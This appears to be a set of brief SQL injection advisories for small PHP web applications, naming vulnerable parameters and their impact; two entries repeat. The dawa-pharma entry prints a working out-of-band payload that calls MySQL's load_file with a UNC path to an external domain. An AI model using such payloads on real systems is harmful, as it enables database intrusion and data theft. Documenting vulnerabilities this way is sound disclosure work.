The 'id' parameter of Computer Laboratory Management System v1.0 is prone to SQL injection attacks. By injecting a payload that includes a sub-query to MySQL's load_file function with a UNC file path pointing to an external domain, an attacker can execute malicious SQL queries and retrieve sensitive information from the system.
The 'nid' parameter in Best Student Result Management System v1.0 is prone to SQL injection attacks. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database. By injecting a malicious payload that calls MySQL's load_file function with a UNC file path pointing to an external domain, the attacker can interact with the external domain and extract sensitive information from the system.
The 'cityedit' parameter in the Human Resource Management System v1.0 is vulnerable to SQL injection attacks. An attacker can inject a payload that calls MySQL's load_file function with a UNC file path referencing a URL on an external domain. By executing this injected SQL query, the attacker can gain access to all information stored in the system.
The 'cid' parameter in Fundraising Script-1.0 is vulnerable to SQL injection attacks. By injecting a payload like 'mysql' into the 'cid' parameter, an attacker can potentially manipulate the database and access sensitive information. This could lead to unauthorized access to donor information and bank accounts.
The 'searchtitle' parameter in 101 News-1.0 is vulnerable to SQL injection attacks. By injecting a SQL sub-query payload that calls MySQL's load_file function with a UNC file path referencing an external domain, an attacker can execute malicious SQL queries. The application interacts with the external domain, confirming the successful execution of the injected SQL query.
The 'id' parameter in PHP Shopping Cart-4.2 is vulnerable to SQL injection attacks. By manipulating the 'id' parameter, an attacker can easily retrieve sensitive information from the database of the web application.
The Equipment Rental Script-1.0 is vulnerable to SQL injection in the package_id parameter. By injecting a payload such as 'mysql', an attacker can manipulate the database and potentially retrieve sensitive information. An error message was triggered when the payload was injected, indicating the presence of a SQL injection vulnerability.
The 'email' parameter in dawa-pharma-1.0-2022 is vulnerable to SQL injection attacks. By injecting a malicious payload like '+(select load_file('\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\lhc'))+', an attacker can execute a sub-query to call MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to retrieve sensitive information of clients and access server data.
The 'cid' parameter in Fundraising Script-1.0 is vulnerable to SQL injection attacks. By submitting the payload ' as the cid parameter, a database error message was returned. If the database is not empty, this vulnerability could lead to unauthorized access to sensitive information such as donor's money and bank account details.
The searchtitle parameter in 101 News-1.0 is vulnerable to SQL injection attacks. By submitting a specific payload in the searchtitle parameter, an attacker can inject a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to interact with the external domain, confirming the successful execution of the injected SQL query.
Services By CQR